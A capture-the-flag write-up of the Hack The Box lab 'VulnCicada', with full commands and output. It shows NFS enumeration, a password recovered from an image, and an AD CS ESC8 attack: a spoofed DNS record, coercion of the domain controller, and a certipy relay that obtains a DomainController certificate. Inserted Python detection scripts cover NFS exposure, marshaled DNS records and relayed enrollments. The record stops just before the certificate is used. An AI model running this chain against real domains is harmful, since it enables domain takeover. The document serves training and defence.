Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ nmap -sC -sV -Pn 10.129.234.48 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-07 21:30 UTC
Nmap scan report for 10.129.234.48
Host is up (0.27s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-07 10:32:04Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2025-10-07T10:22:15
|_Not valid after: 2026-10-07T10:22:15
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2025-10-07T10:22:15
|_Not valid after: 2026-10-07T10:22:15
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2025-10-07T10:22:15
|_Not valid after: 2026-10-07T10:22:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2025-10-07T10:22:15
|_Not valid after: 2026-10-07T10:22:15
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-07T10:33:50+00:00; -10h59m01s from scanner time.
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2025-10-06T10:29:56
|_Not valid after: 2026-04-07T10:29:56
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -10h59m03s, deviation: 2s, median: -10h59m05s
| smb2-time:
| date: 2025-10-07T10:33:07
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.82 seconds
Add DC-JPQ225.cicada.vl to our /etc/hosts.
SMB - 445
I will start by authenticating to the SMB service as the guest user:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb cicada.vl -u guest -p ""
SMB 10.129.234.48 445 10.129.234.48 [*] x64 (name:10.129.234.48) (domain:10.129.234.48) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.129.234.48 445 10.129.234.48 [-] 10.129.234.48\guest: STATUS_NOT_SUPPORTED
NTLM auth is disabled, so I would try Kerberos instead:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb cicada.vl -u guest -p "" -k
SMB cicada.vl 445 cicada [*] x64 (name:cicada) (domain:vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB cicada.vl 445 cicada [-] vl\guest: [Errno Connection error (VL:88)] [Errno -2] Name or service not known
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb cicada.vl -u wither -p "" -k
SMB cicada.vl 445 cicada [*] x64 (name:cicada) (domain:vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB cicada.vl 445 cicada [-] vl\wither: [Errno Connection error (VL:88)] [Errno -2] Name or service not known
The Kerberos attempts fail because netexec treats cicada.vl as host cicada in domain vl and cannot resolve a KDC for VL (the VL:88 error). There is nothing interesting left here.
NFS - 2049
There is a public NFS share on VulnCicada:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ showmount -e 10.129.234.48
Export list for 10.129.234.48:
/profiles (everyone)
I will mount the share on /mnt on my local machine:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ sudo mount -t nfs -o rw 10.129.234.48:/profiles /mnt
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ ls /mnt
Administrator Daniel.Marshall Debra.Wright Jane.Carter Jordan.Francis Joyce.Andrews Katie.Ward Megan.Simpson Richard.Gibbons Rosie.Powell Shirley.West
It looks like this is probably the C:\Users directory.
Because the export is open to everyone, the anonymous client has access to all of these directories (most are empty):
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ find /mnt -ls
1407374883623611 4 drwxrwxrwx 2 nobody nogroup 4096 Jun 3 10:21 /mnt
2533274790396733 1 drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 /mnt/Administrator
1688849860264767 1 drwx------ 2 nobody nogroup 64 Sep 15 2024 /mnt/Administrator/Documents
find: ‘/mnt/Administrator/Documents’: Permission denied
1688849860264783 1456 -rwxrwxrwx 1 nobody nogroup 1490573 Sep 13 2024 /mnt/Administrator/vacation.png
844424930132659 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Daniel.Marshall
844424930132661 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Debra.Wright
1125899906843319 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Jane.Carter
844424930132665 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Jordan.Francis
844424930132667 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Joyce.Andrews
844424930132669 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Katie.Ward
1125899906843329 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Megan.Simpson
844424930132675 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Richard.Gibbons
562949953422027 1 drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 /mnt/Rosie.Powell
5066549580792907 1 drwx------ 2 nobody nogroup 64 Sep 15 2024 /mnt/Rosie.Powell/Documents
find: ‘/mnt/Rosie.Powell/Documents’: Permission denied
2251799813708883 1792 -rwx------ 1 nobody nogroup 1832505 Sep 13 2024 /mnt/Rosie.Powell/marketing.png
562949953422029 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Shirley.West
vacation.png and marketing.png (images shown in the post). We can find a password in the second picture, marketing.png.
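An audit of what the open export above actually hands to an anonymous client, as an added example that is not part of the original post: it parses showmount -e output for exports mountable by everyone and find -ls output for entries whose "other" permission bits let a nobody-mapped client read or write them. The sample input is constructed from the command output shown above.

```python
# Audit of anonymous NFS exposure: open exports plus world-readable/writable entries.
# Sample input below is constructed from the showmount -e and find -ls output above.

SHOWMOUNT_OUTPUT = """Export list for 10.129.234.48:
/profiles (everyone)
"""

FIND_LS_OUTPUT = """1407374883623611 4 drwxrwxrwx 2 nobody nogroup 4096 Jun 3 10:21 /mnt
2533274790396733 1 drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 /mnt/Administrator
1688849860264767 1 drwx------ 2 nobody nogroup 64 Sep 15 2024 /mnt/Administrator/Documents
find: '/mnt/Administrator/Documents': Permission denied
1688849860264783 1456 -rwxrwxrwx 1 nobody nogroup 1490573 Sep 13 2024 /mnt/Administrator/vacation.png
2251799813708883 1792 -rwx------ 1 nobody nogroup 1832505 Sep 13 2024 /mnt/Rosie.Powell/marketing.png
"""


def open_exports(showmount_text):
    """Return export paths whose client list includes everyone (or the * wildcard)."""
    found = []
    for line in showmount_text.splitlines():
        if line.startswith("Export list") or not line.strip():
            continue
        path, _, clients = line.partition(" ")
        allowed = {c.strip() for c in clients.strip().strip("()").split(",")}
        if allowed & {"everyone", "*"}:
            found.append(path)
    return found


def find_ls_findings(find_text):
    """Parse `find -ls` lines and report what the 'other' permission bits expose."""
    findings = []
    for line in find_text.splitlines():
        parts = line.split(None, 10)
        if len(parts) < 11 or parts[2][0] not in "d-":
            continue  # skip "Permission denied" and other non-entry lines
        mode, path = parts[2], parts[10]
        other = mode[7:10]  # rwx bits for "other": what a nobody-mapped client gets
        if "w" in other:
            findings.append((path, "world-writable"))
        elif "r" in other:
            findings.append((path, "world-readable"))
    return findings


def audit(showmount_text, find_text):
    """Combine both checks into one report a defender can act on."""
    findings = find_ls_findings(find_text)
    return {
        "open_exports": open_exports(showmount_text),
        "writable": [p for p, kind in findings if kind == "world-writable"],
        "readable": [p for p, kind in findings if kind == "world-readable"],
    }


if __name__ == "__main__":
    for key, paths in audit(SHOWMOUNT_OUTPUT, FIND_LS_OUTPUT).items():
        print(key, paths)
```

On this export every profile directory is writable by anyone, not just readable, so the exposure is broader than the password in the image.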
Auth as Rosie.Powell
Now we can use this credential to check the SMB service:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k --shares
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] Enumerated shares
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 Share Permissions Remark
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 ----- ----------- ------
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 ADMIN$ Remote Admin
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 C$ Default share
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 CertEnroll READ Active Directory Certificate Services share
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 IPC$ READ Remote IPC
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 NETLOGON READ Logon server share
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 profiles$ READ,WRITE
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 SYSVOL READ Logon server share
I'll get a TGT as Rosie.Powell using Impacket's getTGT.py:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ getTGT.py CICADA/Rosie.Powell -dc-ip 10.129.234.48
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in Rosie.Powell.ccache
Then we can use this credential cache to connect to the SMB service:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ export KRB5CCNAME=Rosie.Powell.ccache
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ smbclient.py -k DC-JPQ225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
IPC$
NETLOGON
profiles$
SYSVOL
CertEnroll holds a bunch of certificate revocation lists (.crl files):
# use CertEnroll
# ls
drw-rw-rw- 0 Mon Jun 16 20:41:25 2025 .
drw-rw-rw- 0 Fri Sep 13 15:17:59 2024 ..
-rw-rw-rw- 741 Mon Jun 16 20:36:08 2025 cicada-DC-JPQ225-CA(1)+.crl
-rw-rw-rw- 941 Mon Jun 16 20:36:08 2025 cicada-DC-JPQ225-CA(1).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(10)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(10).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(11)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(11).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(12)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(12).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(13)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(13).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(14)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(14).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(15)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(15).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(16)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(16).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(17)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(17).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(18)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(18).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(19)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(19).crl
-rw-rw-rw- 741 Mon Jun 16 20:36:08 2025 cicada-DC-JPQ225-CA(2)+.crl
-rw-rw-rw- 941 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(2).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(20)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(20).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(21)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(21).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(22)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(22).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(23)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(23).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(24)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(24).crl
These are published CRLs, public data and not sensitive.
Given the ADCS activity, I would use certipy-ad to check for vulnerable templates and CA settings:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ certipy-ad find -target DC-JPQ225.cicada.vl -u Rosie.Powell@cicada.vl -p Cicada123 -k -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: DC-JPQ225.cicada.vl.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[*] Successfully retrieved CA configuration for 'cicada-DC-JPQ225-CA'
[*] Checking web enrollment for CA 'cicada-DC-JPQ225-CA' @ 'DC-JPQ225.cicada.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : cicada-DC-JPQ225-CA
DNS Name : DC-JPQ225.cicada.vl
Certificate Subject : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
Certificate Serial Number : 69D1087A9A5CEE8F42039744340508EC
Certificate Validity Start : 2025-10-07 10:25:57+00:00
Certificate Validity End : 2525-10-07 10:35:57+00:00
Web Enrollment
HTTP
Enabled : True
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CICADA.VL\Administrators
Access Rights
ManageCa : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
ManageCertificates : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
Enroll : CICADA.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.
Certificate Templates : [!] Could not find any certificate templates
It finds that the CA itself is vulnerable to ESC8. The Certipy wiki describes ESC8 as:
ESC8 describes a privilege escalation vector where an attacker performs an NTLM relay attack against an AD CS HTTP-based enrollment endpoint. These web-based interfaces provide alternative methods for users and computers to request certificates.
Let's exploit it step by step:
1. Coerce Authentication: The attacker coerces a privileged account to authenticate to a machine controlled by the attacker using NTLM. Common targets for coercion include Domain Controller machine accounts (e.g., using tools like PetitPotam or Coercer, or other RPC-based coercion techniques against MS-EFSRPC, MS-RPRN, etc.) or Domain Admin user accounts (e.g., via phishing or other social engineering that triggers an NTLM authentication).
2. Set up NTLM Relay: The attacker uses an NTLM relay tool, such as Certipy’s relay command, listening for incoming NTLM authentications.
3. Relay Authentication: When the victim account authenticates to the attacker’s machine, Certipy captures this incoming NTLM authentication attempt and forwards (relays) it to the vulnerable AD CS HTTP web enrollment endpoint (e.g., https://<ca_server>/certsrv/certfnsh.asp).
4. Impersonate and Request Certificate: The AD CS web service, receiving what it believes to be a legitimate NTLM authentication from the relayed privileged account, processes subsequent enrollment requests from Certipy as that privileged account. Certipy then requests a certificate, typically specifying a template for which the relayed privileged account has enrollment rights (e.g., the “DomainController” template if a DC machine account is relayed, or the default “User” template for a user account).
5. Obtain Certificate: The CA issues the certificate. Certipy, acting as the intermediary, receives this certificate.
6. Use Certificate for Privileged Access: The attacker can now use this certificate (e.g., in a .pfx file) with certipy auth to authenticate as the impersonated privileged account via Kerberos PKINIT, potentially leading to full domain compromise.
First, create a Windows virtual machine and join it to the domain. The MachineAccountQuota is set to 10 (the default value):
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec ldap DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M maq
LDAP DC-JPQ225.cicada.vl 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP DC-JPQ225.cicada.vl 389 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
MAQ DC-JPQ225.cicada.vl 389 DC-JPQ225 [*] Getting the MachineAccountQuota
MAQ DC-JPQ225.cicada.vl 389 DC-JPQ225 MachineAccountQuota: 10
The DNS record name to add is <host><empty marshaled CREDENTIAL_TARGET_INFORMATION structure>, which in this case is DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.
I'll use bloodyAD to set up the DNS record:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.28
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
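A zone-side check for records like the one just added, as an added example that is not part of the original post: by default any authenticated domain user can create records in an AD-integrated zone, so defenders should look for names that carry the marshaled target-info suffix in front of which a real host name has been placed. The marker "1UWhRC" is taken from the page's own record (the part following the host label "DC-JPQ225"); the zone dump format and the extra hosts are constructed assumptions.

```python
# Detect DNS record names built as <host label><marshaled CREDENTIAL_TARGET_INFORMATION>.
# In the record shown above the structure is everything after "DC-JPQ225" and it
# begins with "1UWhRC"; that prefix is used as the marker here.
MARSHAL_MARKER = "1UWhRC"

# Constructed zone dump in "name TYPE address" form (assumed simplified export of the
# zone's A records); the first line is the record from the page, the rest are ordinary hosts.
ZONE_DUMP = """DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA A 10.10.14.28
DC-JPQ225 A 10.129.234.48
WS01 A 10.129.234.60
"""


def parse_zone(text):
    """Return {name: address} for the A records in the dump."""
    records = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[1].upper() == "A":
            records[parts[0]] = parts[2]
    return records


def find_marshaled_records(records, marker=MARSHAL_MARKER):
    """Flag names carrying the marshaled target-info suffix and report which host
    label sits in front of it, where the record points, and that host's real address."""
    alerts = []
    for name, addr in records.items():
        idx = name.find(marker)
        if idx <= 0:
            continue  # no marker, or nothing in front of it to impersonate
        target = name[:idx]
        alerts.append({
            "record": name,
            "impersonated_host": target,
            "points_to": addr,
            # None if no such host exists in the zone; a mismatch with an existing
            # host's address is the strongest signal that the record is hostile.
            "real_address": records.get(target),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_marshaled_records(parse_zone(ZONE_DUMP)):
        print(alert)
```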
I'll start certipy-ad relay targeting the ADCS web server; it listens on SMB:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ certipy-ad relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
The netexec module coerce_plus will check several different methods to force authentication from a machine account:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, DFSCoerce
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PetitPotam
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, MSEven
At the relay, there's a connection, and it eventually creates a .pfx file:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ certipy-ad relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
[*] SMBD-Thread-2 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Authenticating against http://dc-jpq225.cicada.vl as / SUCCEED
[*] Requesting certificate for '\\' based on the template 'DomainController'
[*] HTTP Request: POST http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Certificate issued with request ID 95
[*] Retrieving certificate for request ID: 95
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certnew.cer?ReqID=95 "HTTP/1.1 200 OK"
[*] Got certificate with DNS Host Name 'DC-JPQ225.cicada.vl'
[*] Certificate object SID is 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Saving certificate and private key to 'dc-jpq225.pfx'
[*] Wrote certificate and private key to 'dc-jpq225.pfx'
[*] Exiting...
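A log-side detection for the request sequence shown above, as an added example that is not from the original post: the CA's IIS site logs each web-enrollment request with the authenticated account and client address, and a computer account (name ending in $) using the /certsrv pages from any address but its own is the artefact a relay leaves, since machines normally obtain certificates through autoenrollment over RPC/DCOM rather than the web UI. The log lines and the host inventory are constructed, modelled on the GET/GET/POST/GET pattern in the relay output.

```python
# Constructed IIS W3C log excerpt for the CA's web enrollment site (not from the
# original post). It mirrors the relay log above: two 401s, a 200 on certfnsh.asp,
# the POST that submits the request, and the certnew.cer download, all authenticated
# as the DC's machine account but arriving from the relay host's address.
IIS_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-10-07 10:40:01 10.129.234.48 GET /certsrv/certfnsh.asp - 80 - 10.10.14.28 - 401
2025-10-07 10:40:01 10.129.234.48 GET /certsrv/certfnsh.asp - 80 - 10.10.14.28 - 401
2025-10-07 10:40:02 10.129.234.48 GET /certsrv/certfnsh.asp - 80 CICADA\DC-JPQ225$ 10.10.14.28 - 200
2025-10-07 10:40:02 10.129.234.48 POST /certsrv/certfnsh.asp - 80 CICADA\DC-JPQ225$ 10.10.14.28 - 200
2025-10-07 10:40:03 10.129.234.48 GET /certsrv/certnew.cer ReqID=95 80 CICADA\DC-JPQ225$ 10.10.14.28 - 200
2025-10-07 10:45:10 10.129.234.48 GET /certsrv/certrqus.asp - 80 CICADA\Rosie.Powell 10.129.234.60 Mozilla/5.0+(Windows) 200
"""

# Pages involved in submitting a request and fetching the issued certificate.
ENROLL_PAGES = {"/certsrv/certfnsh.asp", "/certsrv/certnew.cer"}

# Assumed asset inventory: the address each computer account is expected to come from.
KNOWN_HOSTS = {"DC-JPQ225$": "10.129.234.48"}


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            yield dict(zip(fields, line.split()))


def relayed_machine_enrollments(text, known_hosts=KNOWN_HOSTS):
    """Return (time, account, client ip, method, page) for every web-enrollment request
    made as a machine account from an address other than that machine's own."""
    alerts = []
    for rec in parse_w3c(text):
        if rec.get("cs-uri-stem", "").lower() not in ENROLL_PAGES:
            continue
        account = rec.get("cs-username", "-").split("\\")[-1]
        if not account.endswith("$"):
            continue  # ordinary user traffic to the enrollment UI is expected
        if known_hosts.get(account.upper()) != rec.get("c-ip"):
            alerts.append((rec["time"], account, rec["c-ip"], rec["cs-method"], rec["cs-uri-stem"]))
    return alerts


if __name__ == "__main__":
    for alert in relayed_machine_enrollments(IIS_LOG):
        print(alert)
```

The same rule applied to the CA's own audit events (request received/issued for a DomainController-template certificate to a machine account) gives a second, log-independent signal.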
With the certificate I can authenticate as the computer account:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
